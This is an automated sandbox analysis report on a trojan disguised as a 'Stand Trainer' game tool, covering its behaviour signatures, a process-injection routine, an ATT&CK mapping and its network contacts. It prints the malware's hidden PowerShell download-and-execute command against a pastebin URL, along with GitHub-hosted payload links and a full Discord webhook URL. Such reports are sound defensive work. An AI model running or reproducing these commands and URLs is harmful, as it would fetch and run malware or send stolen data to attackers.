Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4937Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1037
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4100
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5696
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Backend.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeAPI coverage: 2.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep count: 4710 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep count: 5169 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7756Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 1353 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep count: 136 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544Thread sleep count: 109 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1680Thread sleep count: 4809 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1816Thread sleep count: 4937 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360Thread sleep count: 31 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 360Thread sleep time: -28592453314249787s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 892Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep count: 1037 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep count: 744 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3680Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep count: 4100 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 5696 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA028C54 FindFirstFileExW,0_2_00007FF7EA028C54
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000D.00000002.2705160657.00000205B6A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: svchost.exe, 00000007.00000002.3430579832.000001F169A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3432741527.000001F16B05C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000012.00000002.2793307610.0000012779C8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA022788 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EA022788
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA02B60C GetProcessHeap,0_2_00007FF7EA02B60C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA022788 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EA022788
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA0263F0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EA0263F0
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA022968 SetUnhandledExceptionFilter,0_2_00007FF7EA022968
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA02215C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7EA02215C
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FF8B8F75024 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF8B8F75024
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FF8B8F74CE8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF8B8F74CE8
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FF8B8F71910 VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,VirtualFreeEx,VirtualFreeEx,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,6_2_00007FF8B8F71910
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe "C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8530.tmp" "c:\Users\user\AppData\Local\Temp\rlfwipso\CSC770B74A1B374466B59916F033873949.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA02F1C0 cpuid 0_2_00007FF7EA02F1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\xK44OOt7vD.exeCode function: 0_2_00007FF7EA022660 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7EA022660
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		111
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		1
Disable or Modify Tools		LSASS Memory141
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		151
Virtualization/Sandbox Evasion		Security Account Manager151
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync34
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534110 Sample: xK44OOt7vD.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 61 pastebin.com 2->61 63 raw.githubusercontent.com 2->63 65 discord.com 2->65 75 Suricata IDS alerts for network traffic 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Multi AV Scanner detection for submitted file 2->79 83 4 other signatures 2->83 9 xK44OOt7vD.exe 2->9         started        12 forfiles.exe 1 2->12         started        14 forfiles.exe 1 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 81 Connects to a pastebin service (likely for C&C) 61->81 process4 dnsIp5 93 Suspicious powershell command line found 9->93 19 powershell.exe 15 27 9->19         started        24 powershell.exe 7 12->24         started        26 conhost.exe 1 12->26         started        28 powershell.exe 14->28         started        30 conhost.exe 1 14->30         started        59 127.0.0.1 unknown unknown 16->59 signatures6 process7 dnsIp8 67 raw.githubusercontent.com 185.199.110.133, 443, 49736, 49741 FASTLYUS Netherlands 19->67 69 discord.com 162.159.138.232, 443, 49860, 49952 CLOUDFLARENETUS United States 19->69 51 C:\Users\user\...\Stand_Trainer_Updated.exe, PE32+ 19->51 dropped 53 C:\Users\user\AppData\Local\...\Backend.dll, PE32+ 19->53 dropped 55 C:\Users\user\AppData\...\rlfwipso.cmdline, Unicode 19->55 dropped 57 C:\ProgramData\...\BeginSync.lnk, MS 19->57 dropped 85 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->85 87 Suspicious powershell command line found 19->87 89 Tries to open files direct via NTFS file id 19->89 91 2 other signatures 19->91 32 Stand_Trainer_Updated.exe 2 19->32         started        35 csc.exe 3 19->35         started        38 conhost.exe 19->38         started        40 attrib.exe 1 19->40         started        42 powershell.exe 13 24->42         started        45 powershell.exe 28->45         started        file9 signatures10 process11 dnsIp12 73 Contains functionality to inject threads in other processes 32->73 49 C:\Users\user\AppData\Local\...\rlfwipso.dll, PE32 35->49 dropped 47 cvtres.exe 1 35->47         started        71 pastebin.com 172.67.19.24, 443, 49868, 49870 CLOUDFLARENETUS United States 42->71 file13 signatures14 process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
xK44OOt7vD.exe39%ReversingLabsWin64.Trojan.MintPhil

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\Backend.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://go.micro0%URL Reputationsafe
https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.110.133
    		truetrue
      		unknown
      pastebin.com
      		172.67.19.24
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dllfalse
          		unknown
          https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996true
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exefalse
              		unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txtfalse
                		unknown
                http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                  		unknown
                  https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                    		unknown
                    http://pastebin.com/raw/sA04Mwk2false
                      		unknown
